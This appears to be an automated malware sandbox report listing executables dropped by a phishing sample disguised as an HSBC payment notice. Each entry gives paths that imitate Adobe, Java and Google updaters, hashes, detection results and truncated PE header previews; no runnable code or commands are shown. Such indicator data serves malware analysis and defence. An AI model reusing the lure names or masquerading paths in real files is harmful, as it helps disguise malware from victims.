                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P ..............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1640448
                                                                                                                                                  Entropy (8bit):7.159472259252879
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:456AqSPyC+NltpScpzbtvpJoMQSq/jrQaSJLNiXicJFFRGNzj3:LSktbpn7wRGpj3
                                                                                                                                                  MD5:6A02DD3E16D7A89D052D45B7D6A25BEF
                                                                                                                                                  SHA1:1DB101B08732C4770DB7BE40606F062DA58D4381
                                                                                                                                                  SHA-256:B16ECC67F10F27E068A4B5ED61E4709F0D0DB1151AC4DBCD36F0EB59C4FC7771
                                                                                                                                                  SHA-512:4A025B5B7D5131248F4AC7D04A19AB02F1A6ADAAEC920BED46ED1177B0E782DC67E9E03CCD20FE1CF1E85A4617AE9774686FC446CEC7D3D8BC357B8CEA33ADD8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................b.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2953728
                                                                                                                                                  Entropy (8bit):7.089738687162478
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:HGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLWLNiXicJFFRGNzj3:v4OEtwiICvYM3f27wRGpj3
                                                                                                                                                  MD5:F0AB07BD403DA7E7BFACE74A65A2BA5B
                                                                                                                                                  SHA1:42A24F30A4CCA3F9B04F847EF8A1B5F1B8F161A1
                                                                                                                                                  SHA-256:0A973128642684E3AA3ECBB150179EEDAA9A3AD3B3BC41CD2480AD1951DFECBD
                                                                                                                                                  SHA-512:787870CDDE114C05F0260C3C3DC12A0D1450F86C2C5879D7A3C5E203C34FC28E5B48888039DF554304A884AAF5247A1FA48907E8A344A2616DC5FCB0E9A03B79
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......z-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1641472
                                                                                                                                                  Entropy (8bit):5.075016436883043
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:VAMvR+3kMbVjhh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SE+lbVjhhLNiXicJFFRGNzj3
                                                                                                                                                  MD5:AEFE5250CCFA87E82896BFAF8F4EF72D
                                                                                                                                                  SHA1:5F316FACB42636E053E801292F901B8DC7590807
                                                                                                                                                  SHA-256:B827F0107CA3F045C50F3DD92411489799AEED5665A1B675C0ECA8E6CE74DB9E
                                                                                                                                                  SHA-512:E0849F174D98502A05F009014D243853F94031DDF54F0AD15E53379E90E4AB046031A7BBD1A369928B3FF477D840818FD95B076D70B0286D34FF1594E72E19D6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $..............................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1445888
                                                                                                                                                  Entropy (8bit):4.8101812302100875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:rxGBcmlF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FGy+FLNiXicJFFRGNzj3
                                                                                                                                                  MD5:423F1F6668442F29DF26625C3F1F2479
                                                                                                                                                  SHA1:B806982B875EF90D605AB870CEEE90F3A010D708
                                                                                                                                                  SHA-256:73923FCC7BA205BB632A7DE06F1050266D2EEA0BF8F6FB7219F7FCABDCE8C522
                                                                                                                                                  SHA-512:B75AAA01EA5DB7363170DC8581812877FDC69880899203AD4213E0A09C46276A2BAE17EAD5BE6D52FEECA20D61409BABFC2B1045359E50C297B4F6826805CA8F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.............................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1800192
                                                                                                                                                  Entropy (8bit):5.3021708613232725
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:B0vHyTLj8trn3ws3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0Wj4rgs3LNiXicJFFRGNzj3
                                                                                                                                                  MD5:601631AC73B2657C8484C7B8ACD72744
                                                                                                                                                  SHA1:3CACE0C96BBCCE24857B4CEEB113AF34CCC36989
                                                                                                                                                  SHA-256:822C79DEB418579EB1165C636D7B27D3AE09E29BAD2F3F7BC2BDA5E12B48A08E
                                                                                                                                                  SHA-512:5E132A5463F5608F413F1098CE7AE23AD3319848954DFBDDA143F7C74B0CC9D42F699BA39350DA377E02480AFFEF3C039F66B73E87F2222477B1FFA3867F6191
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&......9......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1781760
                                                                                                                                                  Entropy (8bit):7.271336010967807
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:B4ijwGJra0uAUfkVy7/ZmLNiXicJFFRGNzj3:BNjwGJrakUQyw7wRGpj3
                                                                                                                                                  MD5:3644900F23B4B044A117CC0C340482A8
                                                                                                                                                  SHA1:9B7A6CDFC91678FC31BF4A991BC0764E2B57996E
                                                                                                                                                  SHA-256:0E65536F92924A2A57448D3528E0A78263EBB79FF61CCF5B666FC5206F20434F
                                                                                                                                                  SHA-512:341E8210BA1A6C381314E3753057AED0B0DD9D791739F9294853EFD76FB1CC07D55F1B5FC84C9C184FA25ED4A26C95C23C0913324A48BAB7133D5B9AADB8EBEC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................z...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1318400
                                                                                                                                                  Entropy (8bit):7.4383605944119875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LeR0gB6axoCxyR6RLQRF/TzJqe58BimZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FgHxWR6uBTzge5MimZLNiXicJFFRGNzb
                                                                                                                                                  MD5:CF3995E1B49C54199D91B11F24808B8A
                                                                                                                                                  SHA1:3D42E1EE91679591171AF0BCED57AC270609E7B9
                                                                                                                                                  SHA-256:F4057370B95922B8540AB9D40F92D5736C19803AC605D393166AF02B39F89942
                                                                                                                                                  SHA-512:5606A6C2C74A9B7D7954CDFABBAFDF1A92B0FA539246038751CD67078B53455BFDFF8ADD99A536D213A885DFA17054AA848FB95C93DF76695B6D20BBB85CD316
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`...... .......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.994897716042273
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:kpwOtO7H/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kmOtmHLNiXicJFFRGNzj3
                                                                                                                                                  MD5:ACA0546EDCA38ACADBEBE503AB3B46F9
                                                                                                                                                  SHA1:F8AF0B198653F37A0A1EE254E209DC57BD8940A5
                                                                                                                                                  SHA-256:78D8A5E9C9D4F0D0DDC6F0ECF82C0AE1DC69F28891BF50F507018E4D4C9F3851
                                                                                                                                                  SHA-512:B34906C902F77C2A0BA3EFB0D6BF3BCB9F45EAD07CEC283F27F844284A1F92366A907DEB75C5935F766E4A31D49229FC95F0D3E503714A7CDCD5379117349F85
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.995594843201295
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:5KU/h/4KU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5r/VULNiXicJFFRGNzj3
                                                                                                                                                  MD5:7FF1545300ACB830F5318AB6E28EBB3A
                                                                                                                                                  SHA1:E6247C90B8170398E3DEDD861CA0606F9AB5A81C
                                                                                                                                                  SHA-256:89D031210375622AC960CF21C39DC1C5ADF88B482B1CC7AF1A69028C2491F6E6
                                                                                                                                                  SHA-512:F473B833D811DE9C9B0CC38C1CCBBF43F5367D6E3FA4E43D696F1C0205AB1AF8A123FDCB02F9AF7C99B288D90861491C8D15FFC53B8107E692102B4B76CBBB29
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....4y.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                  Entropy (8bit):5.069203119438947
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Ux7YiBLZ05jNTmJWExj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UxUiHIjNgjLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1B8817EFF563851DCE02E1E6DEE55BB1
                                                                                                                                                  SHA1:B3C9B8D6002B6B860AA0328B730482842D895711
                                                                                                                                                  SHA-256:C24179518989CD3BEF44ED9FBE9551266706E93C9EB19D53D190408DBDFF047A
                                                                                                                                                  SHA-512:10EB6878874EBFF4E9584DBBAC44AD38163C218AA647F022440F5397AB49FE1B4DFF7B5075AC58FD47C51B0CBA519809E89C11394A09BE897A329BE176225752
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.....Y...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1574912
                                                                                                                                                  Entropy (8bit):5.027359293706216
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ElnRkld6fgJcEwixh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gokfgJcEwChLNiXicJFFRGNzj3
                                                                                                                                                  MD5:F10E046C09F70C6B72C18BA346A150E4
                                                                                                                                                  SHA1:23B831A830A2494B0C064096DA335464849C44FD
                                                                                                                                                  SHA-256:22AD0CAD42A3028796B11E70E6489BA80E28DB9924EF29CE173E5798FDA8DD40
                                                                                                                                                  SHA-512:25FEDE02F26234FA1A0010C890A5D29069B2CC88B835507E74565E0DE5BAB326535743AF8FEBE292041E5D3D7D5CB071CE085D4D9B151334254E80F19E912ECF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#......B......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1677824
                                                                                                                                                  Entropy (8bit):5.084990338798479
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:eWR5k8hb0Haw+xR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eWLk8SHawmRLNiXicJFFRGNzj3
                                                                                                                                                  MD5:4F59D110799E64365FB4B5348D220CF0
                                                                                                                                                  SHA1:D39AD96F76D9981AE3B9A0416CAB1065BD874E0B
                                                                                                                                                  SHA-256:799D3BCF91156DC35F676A9CDDBD3C0D258285F594915609080D22C8AAEAC2D5
                                                                                                                                                  SHA-512:87AD5CFE4EBF655DC07B6B64AD4D47F02D6BF002598E6C24373A53DD4A37E70E18E20D408595340C76F18586920C1300911983693185DBA6FD10512BDC42DFE5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1437696
                                                                                                                                                  Entropy (8bit):4.700943846932461
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:wkCKABp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:wxKkpLNiXicJFFRGNzj3
                                                                                                                                                  MD5:78484D01C84E95A6FA1581BB1E880948
                                                                                                                                                  SHA1:57F9F5A3A9ACAF273F0FA73F59ED7B9632EE815A
                                                                                                                                                  SHA-256:7E77E9646832D8E8CE9FF42385204E306966AEDD4B6998E05A2C56EB12E83F3B
                                                                                                                                                  SHA-512:DE7580D0D23CAE10BABCCEF5A298CA8152CB92DCE71016C4D64D52E676BD44974E9108065E0028472F48E327C36C0251DAA69FC7D032A48C2D6F4CB173FAD7C3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... .....[.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                  Entropy (8bit):4.6808704471269555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:AjNWBPa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SNmyLNiXicJFFRGNzj3
                                                                                                                                                  MD5:F0DB49F2F1C857BCD3628624905D7103
                                                                                                                                                  SHA1:73593FA7F5C36AB006E07A43A00139D0656BDCA3
                                                                                                                                                  SHA-256:490DD7F89309CEE1C758181470C767F5F10C929C772BF6C2605EED353345A389
                                                                                                                                                  SHA-512:0B0E722DD30EFF7068BC73A56E969C7B588542639B87D76964D6F19A0FC168A270AA7D726815A1441849C9E1EC33ED6FEA9C72DFC11C9A3E8C48BB67F827FAD9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... ......(.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1458176
                                                                                                                                                  Entropy (8bit):4.778597871587847
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:EijRyhdsRrI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EijsoRILNiXicJFFRGNzj3
                                                                                                                                                  MD5:A7AF7A01A549312BB3F5BA2E469340E0
                                                                                                                                                  SHA1:D93DF3CCA2A48B3DCF6B7B76325B7ADE61E753AA
                                                                                                                                                  SHA-256:E680E6E0B38F9E7131EAD95B20E3CE3DB212BA766F11F69CAED0CE2777E62C21
                                                                                                                                                  SHA-512:CFBA5019A622A489018611F9FB9EDFA2863E927A6F8B866DE7EE397BD2B2DAB8DA897C6499B0676C70268EEC5F6A7C60D1EF774E81475A3FB6C720190A5F8DA9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1498112
                                                                                                                                                  Entropy (8bit):4.895431685230195
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:l16DmRF+wpx/Qafv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:MmRF+wn/JfvLNiXicJFFRGNzj3
                                                                                                                                                  MD5:C5822B9F91A5D1C7A86E51EC41F8E58F
                                                                                                                                                  SHA1:74E330380A29861D2489E5CAA28B9BEF9876F346
                                                                                                                                                  SHA-256:601C5BE34A8C6FB93AE21836EADB835225EF630342B9ECB034DF585599D23DFA
                                                                                                                                                  SHA-512:1A4F419A87D41BCC2888447CB10183BFDBB0FE76A4684F4142E55CB141620B535EBBE71E60B0974E86DC61E399965EECB5151DA4AA150E15E6A3AC4913DA1015
